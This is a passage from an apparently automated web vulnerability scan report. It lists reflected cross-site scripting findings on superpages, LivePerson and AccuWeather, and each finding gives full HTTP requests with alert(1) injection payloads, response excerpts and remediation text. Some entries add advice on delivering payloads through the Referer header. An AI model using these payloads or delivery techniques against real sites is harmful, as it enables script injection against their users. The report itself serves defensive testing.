The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 379de"-alert(1)-"93123347901 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews379de"-alert(1)-"93123347901/js/logclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews379de&quot;-alert(1)-&quot;93123347901/js/logclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=4C4F8506785984A473A9B8524947C7EA; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:51 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
rv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews379de"-alert(1)-"93123347901/js/logclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.655. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/logclick.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e628d"-alert(1)-"c967b65125d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/jse628d"-alert(1)-"c967b65125d/logclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/jse628d&quot;-alert(1)-&quot;c967b65125d/logclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=0AFB22647AF905FBE48BA572E2509F50; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:35:03 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/jse628d"-alert(1)-"c967b65125d/logclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.656. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/logclick.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66a3d"-alert(1)-"07047fb75a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/js/logclick.js66a3d"-alert(1)-"07047fb75a4 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/js/logclick.js66a3d&quot;-alert(1)-&quot;07047fb75a4
Server: Unspecified
Set-Cookie: JSESSIONID=1ACF9BB55F7200980D5EE25293B5CD5B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:35:15 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
llowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/js/logclick.js66a3d"-alert(1)-"07047fb75a4?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.657. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /se/compositepage.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c297c"-alert(1)-"e7400485e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sec297c"-alert(1)-"e7400485e53/compositepage.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /sec297c&quot;-alert(1)-&quot;e7400485e53/compositepage.css
Server: Unspecified
Set-Cookie: JSESSIONID=396D5ADBD4D3142B9A631194C0B5FB09; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:54 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
ostServ = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/sec297c"-alert(1)-"e7400485e53/compositepage.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.658. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /se/compositepage.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b676"-alert(1)-"7c7f2a5b008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se/compositepage.css9b676"-alert(1)-"7c7f2a5b008 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /se/compositepage.css9b676&quot;-alert(1)-&quot;7c7f2a5b008
Server: Unspecified
Set-Cookie: JSESSIONID=EF454397094E37958A6FE11A378F5815; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:02 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/se/compositepage.css9b676"-alert(1)-"7c7f2a5b008?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.659. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/addList.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93874"-alert(1)-"5a42a034316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp93874"-alert(1)-"5a42a034316/js/addList.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp93874&quot;-alert(1)-&quot;5a42a034316/js/addList.js
Server: Unspecified
Set-Cookie: JSESSIONID=3158E03FC87257FBDA42942A3231293F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:23 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
ostServ = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp93874"-alert(1)-"5a42a034316/js/addList.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.660. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/addList.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1fb9"-alert(1)-"1f6ee091e6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/jsa1fb9"-alert(1)-"1f6ee091e6a/addList.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/jsa1fb9&quot;-alert(1)-&quot;1f6ee091e6a/addList.js
Server: Unspecified
Set-Cookie: JSESSIONID=D78C585477C06ABDFE12EC5A0B25B438; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:40 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
Serv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/jsa1fb9"-alert(1)-"1f6ee091e6a/addList.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.661. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/addList.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3517"-alert(1)-"9ab61aa91ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/js/addList.jse3517"-alert(1)-"9ab61aa91ab HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/js/addList.jse3517&quot;-alert(1)-&quot;9ab61aa91ab
Server: Unspecified
Set-Cookie: JSESSIONID=672734BFB58DFD80247BC648ECB604A3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:48 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
p://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/js/addList.jse3517"-alert(1)-"9ab61aa91ab?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.662. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/showHide.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbf87"-alert(1)-"52571632a65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ypbbf87"-alert(1)-"52571632a65/js/showHide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /ypbbf87&quot;-alert(1)-&quot;52571632a65/js/showHide.js
Server: Unspecified
Set-Cookie: JSESSIONID=3503703CC4CACD6B2BC941DCABAA2129; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:22 GMT
Cache-Control: private
Content-Length: 36073


                       <!--
       
       -->


                                   
...[SNIP]...
ostServ = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/ypbbf87"-alert(1)-"52571632a65/js/showHide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.663. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/showHide.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eeb8"-alert(1)-"e241847a207 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/js4eeb8"-alert(1)-"e241847a207/showHide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/js4eeb8&quot;-alert(1)-&quot;e241847a207/showHide.js
Server: Unspecified
Set-Cookie: JSESSIONID=15C47AD265D59EE717AEA5A2D2950B64; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:39 GMT
Cache-Control: private
Content-Length: 36073


                       <!--
       
       -->


                                   
...[SNIP]...
Serv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/js4eeb8"-alert(1)-"e241847a207/showHide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.664. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/showHide.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed951"-alert(1)-"e596cd16daa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/js/showHide.jsed951"-alert(1)-"e596cd16daa HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/js/showHide.jsed951&quot;-alert(1)-&quot;e596cd16daa
Server: Unspecified
Set-Cookie: JSESSIONID=5BD8F1FDB942096A70CE97B3C572330D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:48 GMT
Cache-Control: private
Content-Length: 36073


                       <!--
       
       -->


                                   
...[SNIP]...
://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/js/showHide.jsed951"-alert(1)-"e596cd16daa?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.665. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c7f'-alert(1)-'d23b91857f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

The response also stores the same referrer, URL-encoded, in a visitor cookie scoped to .liveperson.com (see the Set-Cookie header below). Whether later responses replay the value from that cookie rather than from the header is worth checking: if they do, the payload would persist across the user's subsequent requests to the domain instead of depending on the Referer of each one.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the echoed data arrives in a request header rather than in the URL, this is less straightforward to exploit against another user than a query-string flaw: the attacker cannot simply hand the victim a link that contains the payload. The Referer header is nevertheless partly attacker-influenced. When the victim reaches the target from an attacker-controlled page, the browser sends that page's URL as the Referer, and the referrer policy that decides how much of the URL is sent belongs to the referring page, so the attacker can declare unsafe-url and send the full URL even though browsers now trim cross-origin referrers to the origin by default. The limiting factor is URL serialization: spec-conforming browsers percent-encode double quotes and angle brackets anywhere in an http URL and a single quote in the query component, but leave a single quote in the path alone, so the probe used here is deliverable from a path such as /c0c7f'-alert(1)-'d23b91857f7 on the attacker's host, while a probe that needs <script> tags is not. In the past, client-side technologies such as Flash could also be used to make another user send a request with an arbitrary HTTP header. These constraints partially mitigate the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c0c7f'-alert(1)-'d23b91857f7

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 13:47:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3686
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Dc0c7f%27%2Dalert%281%29%2D%27d23b91857f7; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=LLOJGOICFHNPLMCFLGEAMHAL; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<TITLE>Customer Service Solutions - LivePerson</title>
<META NAME="descripti
...[SNIP]...
<script language='javascript'>
   lpAddVars('visitor','Visitor+Referrer','http://www.google.com/search?hl=en&q=c0c7f'-alert(1)-'d23b91857f7');
   lpAddVars('page','pageName','');
</script>
...[SNIP]...

1.666. http://www.accuweather.com/index-radar.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /index-radar.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f5bc</script><script>alert(1)</script>da526c0c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

Note that this probe does not close the single-quoted string at all: the injected </script> ends the script element at the HTML tokenizer level, which takes no notice of open JavaScript quotes, and the <script>alert(1)</script> that follows is parsed as a new element. An encoder that only escapes quotes and backslashes therefore does not fix this sink; the < character must be escaped as well (for example as \u003c).

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index-radar.asp HTTP/1.1
Host: www.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Length: 64616
Content-Type: text/html
Cache-Control: public
Date: Thu, 03 Feb 2011 16:35:04 GMT
Connection: close
Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/
Set-Cookie: aco=dbg=0; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law
...[SNIP]...

1.667. http://www.accuweather.com/maps-satellite.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /maps-satellite.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea202</script><script>alert(1)</script>53080030620 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. As in 1.666, the probe leaves the single-quoted string intact and instead terminates the script element itself, so escaping quotes alone would not close this sink.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

